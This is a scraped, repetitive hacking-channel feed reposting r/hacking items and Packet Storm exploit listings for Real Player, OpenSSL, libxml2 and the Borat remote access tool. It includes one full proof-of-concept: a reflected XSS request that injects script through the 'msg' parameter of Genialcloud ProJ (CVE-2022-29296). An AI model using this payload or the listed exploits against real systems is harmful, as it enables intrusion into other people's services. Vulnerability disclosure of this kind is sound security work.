Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Iran is responsible for "one of the most despicable" cyberattacks FBI has ever seen, targetting Boston Children's Hospital
https://external-preview.redd.it/ehwdTLLOTdRDKcGKFx1M-6r36nFiOwGDZr-3TVXa9lU.jpg?width=640&crop=smart&auto=webp&s=82df0d652bac6f918f6dc0dbf1a68f9ac780d4fb submitted by /u/misconfig_exe
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Iran is responsible for "one of the most despicable" cyberattacks FBI has ever seen, targetting Boston Children's Hospital
https://external-preview.redd.it/ehwdTLLOTdRDKcGKFx1M-6r36nFiOwGDZr-3TVXa9lU.jpg?width=640&crop=smart&auto=webp&s=82df0d652bac6f918f6dc0dbf1a68f9ac780d4fb submitted by /u/misconfig_exe
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Iran is responsible for "one of the most despicable" cyberattacks...
Posted in r/hacking by u/misconfig_exe • 1 point and 0 comments
hacking: security in practice
Borat - Remote Administration Tool
submitted by /u/LimeExploits
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Borat - Remote Administration Tool
submitted by /u/LimeExploits
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Borat - Remote Administration Tool
Posted in r/hacking by u/LimeExploits • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Real Player 20.0.8.310 G2 Control DoGoToURL() Remote Code Execution
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
The G2 Control component in Real Player version 20.0.8.310 suffer from remote code execution vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Real Player 20.0.8.310 G2 Control DoGoToURL() Remote Code Execution
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
The G2 Control component in Real Player version 20.0.8.310 suffer from remote code execution vulnerability.
SHA-256 |
2438a58c4359d3d36d6496e285234087a41157c56bb4df448e56f6cbb9ebd664Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Real Player 20.0.8.310 G2 Control DoGoToURL() Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Real Player 16.00.282 / 16.0.3.51 / Cloud 17.0.9.17 / 20.0.7.309 Remote Code Execution
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png
Real Player versions 16.00.282, 16.0.3.51, Cloud 17.0.9.17, and 20.0.7.309 suffer from external::Import() arbitrary file download and directory traversal vulnerabilities that lead to remote code execution.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Real Player 16.00.282 / 16.0.3.51 / Cloud 17.0.9.17 / 20.0.7.309 Remote Code Execution
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png
Real Player versions 16.00.282, 16.0.3.51, Cloud 17.0.9.17, and 20.0.7.309 suffer from external::Import() arbitrary file download and directory traversal vulnerabilities that lead to remote code execution.
SHA-256 |
7a753f92d50706bc1d9f139def6113809aaadcafbfbef5cdd27e58334d230325Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Real Player 16.00.282 / 16.0.3.51 / Cloud 17.0.9.17 / 20.0.7.309 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
OpenSSL 1.0.2 / 1.1.1 / 3.0 BN_mod_sqrt() Infinite Loop
https://1.bp.blogspot.com/-oHWy7Hh5Fq0/WWlvjd6DOFI/AAAAAAAAIQk/2SpYZjutgb8xmw4nQNmHjmGkgvDsryz_gCLcBGAs/s1600/h93.png
The BN_mod_sqrt() function in OpenSSL versions 1.0.2, 1.1.1, and 3.0, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
OpenSSL 1.0.2 / 1.1.1 / 3.0 BN_mod_sqrt() Infinite Loop
https://1.bp.blogspot.com/-oHWy7Hh5Fq0/WWlvjd6DOFI/AAAAAAAAIQk/2SpYZjutgb8xmw4nQNmHjmGkgvDsryz_gCLcBGAs/s1600/h93.png
The BN_mod_sqrt() function in OpenSSL versions 1.0.2, 1.1.1, and 3.0, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli.
SHA-256 |
b8c560eda5504347f10dd0a9166545d0f6d2637eb9ca4cc2944f2c46e26d7f2bDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
OpenSSL 1.0.2 / 1.1.1 / 3.0 BN_mod_sqrt() Infinite Loop
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
libxml2 xmlBufAdd Heap Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
libxml2 xmlBufAdd Heap Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
libxml2 xmlBufAdd Heap Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Real Player 16.0.3.51 / Cloud 17.0.9.17 / 20.0.7.309 DCP URI Remote Code Execution
https://4.bp.blogspot.com/-yT3eHciMBDw/WWlvGfUXh9I/AAAAAAAAILU/lYidSj08G0suEfC69x80tZFrj-NYN5F9wCLcBGAs/s1600/h137.png
Real Player versions 16.0.3.51, Cloud 17.0.9.17, and 20.0.7.309 suffer from a DCP:// URI remote code execution vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Real Player 16.0.3.51 / Cloud 17.0.9.17 / 20.0.7.309 DCP URI Remote Code Execution
https://4.bp.blogspot.com/-yT3eHciMBDw/WWlvGfUXh9I/AAAAAAAAILU/lYidSj08G0suEfC69x80tZFrj-NYN5F9wCLcBGAs/s1600/h137.png
Real Player versions 16.0.3.51, Cloud 17.0.9.17, and 20.0.7.309 suffer from a DCP:// URI remote code execution vulnerability.
SHA-256 |
8a359aeb74dfcb0d2cdf2b2a15aeb57867b10d99cfa4221cac03bafb5f4b59b9Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Real Player 16.0.3.51 / Cloud 17.0.9.17 / 20.0.7.309 DCP URI Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Avantune Genialcloud ProJ 10 Cross Site Scripting
https://4.bp.blogspot.com/-VWb4EvQ6bEo/WWlvWDArLMI/AAAAAAAAIOE/2pUCVP0uaRIPq11CtWtknt0n-yL_qFw9wCLcBGAs/s1600/h48.png
Avantune Genialcloud ProJ version 10 suffers from a cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Avantune Genialcloud ProJ 10 Cross Site Scripting
https://4.bp.blogspot.com/-VWb4EvQ6bEo/WWlvWDArLMI/AAAAAAAAIOE/2pUCVP0uaRIPq11CtWtknt0n-yL_qFw9wCLcBGAs/s1600/h48.png
Avantune Genialcloud ProJ version 10 suffers from a cross site scripting vulnerability.
SHA-256 |
7a0d3b9dfd4b8e8ad8e6da668090859f7b1f76c4079023524c8bc929d6e1982fDownload
# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296
Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject
and execute arbitrary web scripts or HTML via a crafted payload.
Request parameters affected is "msg".
PoC Request:
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0
PoC Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162
...[SNIP]...
...[SNIP]...
Timeline:
2022-01-05: Vulnerability discovered.
2022-01-06: Vendor contacted.
2022-02-07: No reply, vendor contacted for 2nd time.
2022-02-10: Request for CVE reservation.
2022-04-16: Assigned CVE number CVE-2022-29296.
2022-05-07: No reply, vendor contacted for 3rd time.
2022-06-01: Public disclosure.
PoC Screenshots:
https://imagebin.ca/v/6j86ekMqKZD8
https://postimg.cc/XXv6YbK9
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Avantune Genialcloud ProJ 10 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
How I found a GoldMine but got No Gold
https://medium.com/@mahitman1/how-i-found-a-goldmine-but-got-no-gold-e912a89fa522?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@mahitman1/how-i-found-a-goldmine-but-got-no-gold-e912a89fa522?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I found a GoldMine but got No Gold
Background:
Background:Continue reading on Medium » (https://medium.com/@mahitman1/how-i-found-a-goldmine-but-got-no-gold-e912a89fa522?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I found a GoldMine but got No Gold
Background: